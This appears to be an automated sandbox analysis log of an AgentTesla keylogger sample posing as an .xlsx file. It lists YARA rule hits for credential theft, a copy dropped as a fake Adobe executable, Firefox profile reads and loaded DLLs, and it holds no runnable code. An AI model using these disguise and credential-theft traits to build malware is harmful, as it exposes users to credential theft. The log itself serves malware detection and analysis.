                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 4_2_06DF65604_2_06DF6560
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 4_2_06DFC0F84_2_06DFC0F8
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 4_2_06DFB1A84_2_06DFB1A8
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 4_2_06DF7CF84_2_06DF7CF8
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 4_2_06DF76184_2_06DF7618
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 4_2_06DFE3284_2_06DFE328
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 4_2_06DF00404_2_06DF0040
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 4_2_06DF5C604_2_06DF5C60
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 4_2_06DF00074_2_06DF0007
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 6_2_050ADFAC6_2_050ADFAC
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 6_2_05CA7D706_2_05CA7D70
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 6_2_05CA00406_2_05CA0040
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 6_2_05CA001D6_2_05CA001D
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 6_2_05CA7D606_2_05CA7D60
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 6_2_05FA30F86_2_05FA30F8
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 6_2_05FAB5186_2_05FAB518
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 6_2_05FAB5086_2_05FAB508
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 6_2_05FAB4E06_2_05FAB4E0
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 6_2_05FA2E986_2_05FA2E98
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 6_2_05FA2E876_2_05FA2E87
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 6_2_05FA30E76_2_05FA30E7
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 6_2_07469F306_2_07469F30
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 6_2_074627F06_2_074627F0
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 6_2_074637886_2_07463788
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 6_2_07465CA06_2_07465CA0
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 6_2_074633506_2_07463350
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 6_2_07463BC06_2_07463BC0
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 6_2_074653C86_2_074653C8
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 6_2_074632FF6_2_074632FF
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 7_2_012A4A907_2_012A4A90
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 7_2_012A3E787_2_012A3E78
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 7_2_012A41C07_2_012A41C0
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 7_2_069517347_2_06951734
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 7_2_069524627_2_06952462
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 7_2_069524687_2_06952468
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 7_2_0695315E7_2_0695315E
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 7_2_069634187_2_06963418
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 7_2_069655507_2_06965550
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 7_2_069665607_2_06966560
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 7_2_0696C0F87_2_0696C0F8
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 7_2_0696B1987_2_0696B198
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 7_2_06967CF87_2_06967CF8
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 7_2_069676187_2_06967618
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 7_2_069627427_2_06962742
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 7_2_0696E3287_2_0696E328
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 7_2_069600407_2_06960040
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 7_2_06965C4F7_2_06965C4F
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 7_2_069600067_2_06960006
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 7_2_0696003E7_2_0696003E
                        Source: BL NBNSA240600050.xlsx.exeBinary or memory string: OriginalFilename vs BL NBNSA240600050.xlsx.exe
                        Source: BL NBNSA240600050.xlsx.exe, 00000000.00000002.1671890602.00000000042B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamea9d26a1c-7dc5-441c-98a8-6dd01f6d79df.exe4 vs BL NBNSA240600050.xlsx.exe
                        Source: BL NBNSA240600050.xlsx.exe, 00000000.00000002.1671407520.000000000331F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamea9d26a1c-7dc5-441c-98a8-6dd01f6d79df.exe4 vs BL NBNSA240600050.xlsx.exe
                        Source: BL NBNSA240600050.xlsx.exe, 00000000.00000002.1671407520.000000000331F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCAA.dll4 vs BL NBNSA240600050.xlsx.exe
                        Source: BL NBNSA240600050.xlsx.exe, 00000000.00000002.1669970757.000000000145E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs BL NBNSA240600050.xlsx.exe
                        Source: BL NBNSA240600050.xlsx.exe, 00000000.00000002.1675267132.0000000008300000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs BL NBNSA240600050.xlsx.exe
                        Source: BL NBNSA240600050.xlsx.exe, 00000000.00000002.1675216718.0000000008110000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameCAA.dll4 vs BL NBNSA240600050.xlsx.exe
                        Source: BL NBNSA240600050.xlsx.exe, 00000000.00000000.1648080040.0000000000FF8000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamethQh.exeT vs BL NBNSA240600050.xlsx.exe
                        Source: BL NBNSA240600050.xlsx.exe, 00000000.00000002.1671407520.00000000032B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCAA.dll4 vs BL NBNSA240600050.xlsx.exe
                        Source: BL NBNSA240600050.xlsx.exe, 00000002.00000002.4111970211.00000000008F9000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs BL NBNSA240600050.xlsx.exe
                        Source: BL NBNSA240600050.xlsx.exeBinary or memory string: OriginalFilenamethQh.exeT vs BL NBNSA240600050.xlsx.exe
                        Source: BL NBNSA240600050.xlsx.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: 0.2.BL NBNSA240600050.xlsx.exe.42ba190.6.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                        Source: 0.2.BL NBNSA240600050.xlsx.exe.42ba190.6.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                        Source: 0.2.BL NBNSA240600050.xlsx.exe.42f57b0.7.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                        Source: 0.2.BL NBNSA240600050.xlsx.exe.42f57b0.7.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                        Source: 0.2.BL NBNSA240600050.xlsx.exe.42f57b0.7.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                        Source: 0.2.BL NBNSA240600050.xlsx.exe.42f57b0.7.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                        Source: 0.2.BL NBNSA240600050.xlsx.exe.42ba190.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                        Source: 0.2.BL NBNSA240600050.xlsx.exe.42ba190.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                        Source: BL NBNSA240600050.xlsx.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: 0.2.BL NBNSA240600050.xlsx.exe.42ba190.6.raw.unpack, yNzg.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.BL NBNSA240600050.xlsx.exe.42ba190.6.raw.unpack, yNzg.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.BL NBNSA240600050.xlsx.exe.42ba190.6.raw.unpack, yNzg.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.BL NBNSA240600050.xlsx.exe.42ba190.6.raw.unpack, yNzg.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.BL NBNSA240600050.xlsx.exe.42ba190.6.raw.unpack, KNymkUU5gB.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.BL NBNSA240600050.xlsx.exe.42ba190.6.raw.unpack, KNymkUU5gB.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                        Source: 0.2.BL NBNSA240600050.xlsx.exe.42ba190.6.raw.unpack, LPE.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.BL NBNSA240600050.xlsx.exe.42ba190.6.raw.unpack, LPE.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.BL NBNSA240600050.xlsx.exe.8300000.10.raw.unpack, MP38G7Vnbsb34JkM2R.csSecurity API names: _0020.SetAccessControl
                        Source: 0.2.BL NBNSA240600050.xlsx.exe.8300000.10.raw.unpack, MP38G7Vnbsb34JkM2R.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: 0.2.BL NBNSA240600050.xlsx.exe.8300000.10.raw.unpack, MP38G7Vnbsb34JkM2R.csSecurity API names: _0020.AddAccessRule
                        Source: 0.2.BL NBNSA240600050.xlsx.exe.8300000.10.raw.unpack, mdGCiWky1rqgK3BVbJ.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: 0.2.BL NBNSA240600050.xlsx.exe.3365b5c.3.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
                        Source: 0.2.BL NBNSA240600050.xlsx.exe.7ea0000.8.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
                        Source: 0.2.BL NBNSA240600050.xlsx.exe.3345460.4.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
                        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@9/4@2/2
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\BL NBNSA240600050.xlsx.exe.logJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeMutant created: NULL
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net data provider for sqlserver
                        Source: BL NBNSA240600050.xlsx.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: BL NBNSA240600050.xlsx.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: BL NBNSA240600050.xlsx.exeReversingLabs: Detection: 73%
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeFile read: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeJump to behavior
                        Source: unknownProcess created: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe "C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe"
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeProcess created: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe "C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe"
                        Source: unknownProcess created: C:\Users\user\AppData\Roaming\Adobe\adobe.exe "C:\Users\user\AppData\Roaming\adobe\adobe.exe"
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess created: C:\Users\user\AppData\Roaming\Adobe\adobe.exe "C:\Users\user\AppData\Roaming\adobe\adobe.exe"
                        Source: unknownProcess created: C:\Users\user\AppData\Roaming\Adobe\adobe.exe "C:\Users\user\AppData\Roaming\adobe\adobe.exe"
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess created: C:\Users\user\AppData\Roaming\Adobe\adobe.exe "C:\Users\user\AppData\Roaming\adobe\adobe.exe"
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeProcess created: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe "C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe"Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess created: C:\Users\user\AppData\Roaming\Adobe\adobe.exe "C:\Users\user\AppData\Roaming\adobe\adobe.exe"Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess created: C:\Users\user\AppData\Roaming\Adobe\adobe.exe "C:\Users\user\AppData\Roaming\adobe\adobe.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeSection loaded: dwrite.dllJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeSection loaded: textshaping.dllJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeSection loaded: windowscodecs.dllJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeSection loaded: rasapi32.dllJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeSection loaded: rasman.dllJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeSection loaded: rtutils.dllJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeSection loaded: schannel.dllJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeSection loaded: mskeyprotect.dllJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeSection loaded: ncryptsslp.dllJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeSection loaded: vaultcli.dllJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: dwrite.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: textshaping.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: windowscodecs.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: rasapi32.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: rasman.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: rtutils.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: schannel.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: mskeyprotect.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: ncryptsslp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: gpapi.dllJump to behavior
